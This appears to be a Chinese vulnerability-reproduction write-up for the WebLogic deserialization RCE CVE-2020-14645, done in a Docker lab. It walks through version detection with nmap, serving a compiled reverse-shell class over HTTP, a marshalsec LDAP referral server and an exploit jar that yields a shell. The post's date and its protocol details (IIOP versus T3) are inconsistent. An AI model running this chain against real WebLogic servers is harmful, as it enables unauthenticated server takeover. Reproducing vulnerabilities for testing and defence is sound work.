漏洞复现-CVE-2020-14645_weblogic_T3反序列化RCE复测

XT 2020-04-07 18:28:00

影响版本

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).
受影响版本:10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 以及 14.1.1.0.0.
影响:简单的漏洞利用即可允许攻击者通过IIOP未授权访问Oracle WebLogic T3。攻击者可利用漏洞接管网站。 CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

环境搭建

docker pull z1du/weblogic12214jdk8u181
windows10
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html12

漏洞验证

工具准备:
git clone git@github.com:mbechler/marshalsec.git
mvn clean package -DskipTests

漏洞poc测试

通过nmap检测版本

1
2
3
4
nmap -n -v -Pn –sV IP地址 -p 端口 --script=/usr/share/nmap/scripts/weblogic-t3-info.nse
PORT STATE SERVICE
7001/tcp open afs3-callback
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.2.1.4)

测试RCE

  1. rce编译
    编译:
    RevShell.java
    编译class文件
    javac RevShell.java

  2. 开启http服务,挂在class文件

    1
    python3 -m http.server 5001

    访问本地http://192.168.31.102:5001/RevShell.class 200,可访问挂载成功

  3. 配置开启LDAP服务
    java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ [<arguments…>]]
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.31.102:5001/#RevShell 1099

  4. rce 命令执行
    java -jar CVE-2020-14645.jar 192.168.31.102:1099/#RevShell http://test.com:7001
    Weblogic version: 12.2.1.4

    反弹shell